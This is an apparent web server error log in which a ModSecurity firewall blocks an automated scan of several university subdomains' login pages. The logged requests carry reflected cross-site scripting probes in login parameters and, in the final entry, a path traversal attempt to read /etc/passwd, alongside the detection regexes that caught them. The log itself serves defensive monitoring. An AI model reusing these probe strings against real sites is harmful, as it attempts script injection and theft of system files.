"ZO16a8Co-f0AAAqY6SgAAAAr"]
[Tue Aug 29 11:56:11.641650 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAolKz4AAAAe"]
[Tue Aug 29 11:56:11.644944 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAq3a7MAAAAI"]
[Tue Aug 29 11:56:11.651685 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApa-UUAAAAg"]
[Tue Aug 29 11:56:11.667155 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAqeFksAAAAx"]
[Tue Aug 29 11:56:11.692772 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAolK0AAAAAe"]
[Tue Aug 29 11:56:11.764366 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAArC7hUAAAAW"]
[Tue Aug 29 11:56:12.535938 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAqeFk4AAAAx"]
[Tue Aug 29 11:56:12.537527 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAApbUxcAAAAh"]
[Tue Aug 29 11:56:12.553744 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAq@shsAAAAM"]
[Tue Aug 29 11:56:12.557661 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAApXgtIAAAAU"]
[Tue Aug 29 11:56:12.558230 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq5@N0AAAAK"]
[Tue Aug 29 11:56:12.563553 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAArB1yYAAAAV"]
[Tue Aug 29 11:56:12.563674 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAobUAAAAAAQ"]
[Tue Aug 29 11:56:12.657365 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAApXgtMAAAAU"]
[Tue Aug 29 11:56:12.660170 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq3a7YAAAAI"]
[Tue Aug 29 11:56:12.672988 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16bMCo-f0AAApHRlgAAAAP"]
[Tue Aug 29 11:56:13.539728 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16bcCo-f0AAAqY6TAAAAAr"]
[Tue Aug 29 11:56:13.544367 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO16bcCo-f0AAAqeFlMAAAAx"]
[Tue Aug 29 11:56:13.565595 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bcCo-f0AAApHRlwAAAAP"]
[Tue Aug 29 11:56:13.595363 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAolK0gAAAAe"]
[Tue Aug 29 11:56:13.608049 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAqY6TMAAAAr"]
[Tue Aug 29 11:56:13.610980 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAq@siEAAAAM"]
[Tue Aug 29 11:56:13.615665 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAolK0kAAAAe"]
[Tue Aug 29 11:56:13.627390 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAqY6TQAAAAr"]
[Tue Aug 29 11:56:14.926980 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16bsCo-f0AAArC7iMAAAAW"]
